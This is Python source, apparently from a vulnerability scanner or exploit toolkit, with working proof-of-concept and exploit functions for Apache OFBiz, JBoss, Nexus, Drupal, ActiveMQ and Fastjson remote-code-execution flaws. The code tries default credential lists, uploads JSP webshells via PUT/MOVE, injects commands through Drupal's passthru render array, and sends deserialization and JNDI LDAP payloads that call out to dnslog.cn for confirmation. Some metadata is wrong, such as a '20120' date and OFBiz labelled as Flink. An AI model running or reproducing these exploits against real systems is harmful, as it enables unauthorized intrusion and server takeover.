def cve_2021_26295_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache OFBiz: CVE-2021-26295" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "Apache OFBiz RMI deserializes arbitrary code execution" self.vul_info["vul_numb"] = "CVE-2021-26295" self.vul_info["vul_apps"] = "Flink" self.vul_info["vul_date"] = "2021-03-25" self.vul_info["vul_vers"] = "< 17.12.06" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Arbitrary Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Apache OFBiz官方发布安全更新,修复了一处由RMI反序列化造成的远程代码执行漏洞。" \ "攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器." self.vul_info["cre_date"] = "2021-03-31" self.vul_info["cre_auth"] = "zhzyker" headers = { 'User-Agent': self.ua, 'Content-Type': 'text/xml', 'Connection': 'close' } def _trans(s): return "%s" % ''.join('%.2x' % x for x in s) def dnslog_re(md): headers_dnslog = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36', 'Host': 'www.dnslog.cn', 'Cookie': 'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548', 'Accept': '*/*', 'Referer': 'http://www.dnslog.cn/', 'Accept-Language': 'zh-CN,zh;q=0.9', 'Connection': 'close' } dnslog_url = "http://www.dnslog.cn/getrecords.php?t=0.913020034617231" dns = requests.get(dnslog_url, headers=headers_dnslog, timeout=10, verify=False) if md in dns.text: return md try: headers_dnslog = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36', 'Host': 'www.dnslog.cn', 'Cookie': 'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548', 'Accept': '*/*', 'Referer': 'http://www.dnslog.cn/', 'Accept-Language': 'zh-CN,zh;q=0.9', 'Connection': 'close' } dnslog_api = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366" dns = requests.post(dnslog_api, headers=headers_dnslog, timeout=10, verify=False) dns = dns.text dns_data = bytes(dns, encoding="utf8") dns_hex = _trans(dns_data) data = self.payload_cve_2021_26295_poc.replace( "RECOMMAND", dns_hex) url = urljoin(self.url, "/webtools/control/SOAPService") request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) if dnslog_re(dns): self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["vul_payd"] = data self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[dns] [rmi:" + dns + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2015_7501_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "RedHat JBoss: CVE-2015-7501" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "JBoss 反序列化远程命令执行漏洞" self.vul_info["vul_numb"] = "CVE-2015-7501" self.vul_info["vul_apps"] = "JBoss" self.vul_info["vul_date"] = "2015-11-15" self.vul_info["vul_vers"] = "5.x, 6.x" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程命令执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "此漏洞主要是由于JBoss中invoker/JMXInvokerServlet路径对外开放,由于JBoss的jmx组件支" \ "持Java反序列化,并且在反序列化过程中没有加入有效的安全检测机制," \ "导致攻击者可以传入精心构造好的恶意序列化数据,在jmx对其进行反序列化处理时," \ "导致传入的携带恶意代码的序列化数据执行,造成反序列化漏洞" self.vul_info["cre_date"] = "2021-01-28" self.vul_info["cre_auth"] = "zhzyker" self.path = "/invoker/JMXInvokerServlet" self.data = ":-)" md = random_md5() cmd = "echo " + md bad = "20" + md try: self.request = requests.post(self.url + self.path, data=self.payload_cve_2015_7501, headers=self.headers, timeout=self.timeout, verify=False) time.sleep(0.5) self.cmd = urlencode({"ppp": cmd}) self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" + self.cmd, headers=self.headers, timeout=self.timeout, verify=False) self.req = requests.post(self.url + self.path, data=self.payload_cve_2015_7501, headers=self.headers, timeout=self.timeout, verify=False) self.cmd = urlencode({"ppp": cmd}) self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" + self.cmd, headers=self.headers, timeout=self.timeout, verify=False) if md in self.request.text: if md in misinformation(self.request.text, md): self.vul_info["vul_data"] = dump.dump_all(self.req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = self.url + self.path self.vul_info[ "prt_info"] = "[JMXInvokerServlet] [upload: " + self.url + "/jexws4/jexws4.jsp?ppp=whoami ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2020_10199_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Nexus Repository Manager: CVE-2020-10199" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Nexus Repository Manager 3 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2020-10199" self.vul_info["vul_apps"] = "Nexus" self.vul_info["vul_date"] = "20120-04-01" self.vul_info["vul_vers"] = "3.x <= 3.21.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当," \ "导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码,获取系统权限。 " self.vul_info["cre_date"] = "2021-01-27" self.vul_info["cre_auth"] = "zhzyker" self.session_headers = { 'Connection': 'keep-alive', 'X-Requested-With': 'XMLHttpRequest', 'X-Nexus-UI': 'true', 'User-Agent': self.ua } md = random_md5() cmd = "echo " + md try: self.us = base64.b64encode(str.encode("admin")) self.pa = base64.b64encode(str.encode("admin")) self.base64user = self.us.decode('ascii') self.base64pass = self.pa.decode('ascii') self.session_data = { 'username': self.base64user, 'password': self.base64pass } self.request = requests.post(self.url + "/service/rapture/session", data=self.session_data, headers=self.session_headers, timeout=20) self.session_str = str(self.request.headers) self.session = (re.search(r"NXSESSIONID=(.*); Path", self.session_str).group(1)) self.rce_headers = { 'Connection': "keep-alive", 'NX-ANTI-CSRF-TOKEN': "0.6153568974227819", 'X-Requested-With': "XMLHttpRequest", 'X-Nexus-UI': "true", 'Content-Type': "application/json", '404': "" + cmd + "", 'User-Agent': self.ua, 'Cookie': "jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520;" \ "NX-ANTI-CSRF-TOKEN=0.6153568974227819; NXSESSIONID=" + self.session + "" } request = requests.post(self.url + "/service/rest/beta/repositories/go/group", data=self.payload_cve_2020_10199, headers=self.rce_headers) if md in request.text: self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = cmd self.vul_info[ "prt_info"] = "[rce] [admin:admin] [payload: " + cmd + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2018_7602_exp(self, cmd): vul_name = "Drupal: CVE-2018-7602" DRUPAL_U = "admin" DRUPAL_P = "admin" try: self.session = requests.Session() self.get_params = {'q': 'user/login'} self.post_params = { 'form_id': 'user_login', 'name': DRUPAL_U, 'pass': DRUPAL_P, 'op': 'Log in' } self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.get_params = {'q': 'user'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.user_id = self.soup.find('meta', { 'property': 'foaf:name' }).get('about') if "?q=" in self.user_id: self.user_id = self.user_id.split("=")[1] self.get_params = {'q': self.user_id + '/cancel'} self.r = self.session.get(self.url, params=self.get_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_token = self.form.find('input', { 'name': 'form_token' }).get('value') self.get_params = { 'q': self.user_id + '/cancel', 'destination': self.user_id + '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd } self.post_params = { 'form_id': 'user_cancel_confirm_form', 'form_token': self.form_token, '_triggering_element_name': 'form_id', 'op': 'Cancel account' } self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.soup = BeautifulSoup(self.r.text, "html.parser") self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'}) self.form_build_id = self.form.find('input', { 'name': 'form_build_id' }).get('value') self.get_params = { 'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id } self.post_params = {'form_build_id': self.form_build_id} self.r = self.session.post(self.url, params=self.get_params, data=self.post_params, headers=self.headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore') verify.exploit_print(self.r.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2016_3088_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2016-3088" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Apache ActiveMQ 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2016-3088" self.vul_info["vul_apps"] = "AcitveMQ" self.vul_info["vul_date"] = "2016-03-10" self.vul_info["vul_vers"] = "< 5.14.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录" self.vul_info["cre_date"] = "2021-01-07" self.vul_info["cre_auth"] = "zhzyker" self.rawdata = None self.path = "null" self.name = random_md5()[:-20] self.webshell = "/" + self.name + ".jsp" self.poc = random_md5() self.exp = self.jsp_webshell self.passlist = [ "admin:123456", "admin:admin", "admin:123123", "admin:activemq", "admin:12345678" ] try: try: for self.pa in self.passlist: self.base64_p = base64.b64encode(str.encode(self.pa)) self.p = self.base64_p.decode('utf-8') self.headers_base64 = { 'User-Agent': self.ua, 'Authorization': 'Basic ' + self.p } self.request = requests.get( self.url + "/admin/test/systemProperties.jsp", headers=self.headers_base64, timeout=self.timeout, verify=False) if self.request.status_code == 200: self.path = \ re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0] break except IndexError: pass self.request = requests.put(self.url + "/fileserver/v.txt", headers=self.headers_base64, data=self.poc, timeout=self.timeout, verify=False) self.headers_move = { 'User-Agent': self.ua, 'Destination': 'file://' + self.path + '/webapps/api' + self.webshell } self.request = requests.request("MOVE", self.url + "/fileserver/v.txt", headers=self.headers_move, timeout=self.timeout, verify=False) self.request = requests.get(self.url + "/api" + self.webshell, headers=self.headers_base64, timeout=self.timeout, verify=False) if self.poc in self.request.text: self.vul_info["vul_data"] = dump.dump_all(self.request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "vul_payd"] = 'file://' + self.path + '/webapps/api' + self.webshell self.vul_info[ "prt_info"] = "[upload: " + self.url + "/api" + self.webshell + " ] [" + self.pa + "]" verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def fastjson_1247_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Fastjson: 1.2.47" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_payd"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞" self.vul_info["vul_numb"] = "null" self.vul_info["vul_apps"] = "Fastjson" self.vul_info["vul_date"] = "2019-07-15" self.vul_info["vul_vers"] = "<= 1.2.47" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。" self.vul_info["cre_date"] = "2021-01-20" self.vul_info["cre_auth"] = "zhzyker" headers = { 'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close' } md = dns_request() dns = md data = { "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://" + dns + "//Exploit", "autoCommit": True } } data = json.dumps(data) try: try: request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False) self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') except: pass if dns_result(md): self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] " self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] " verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()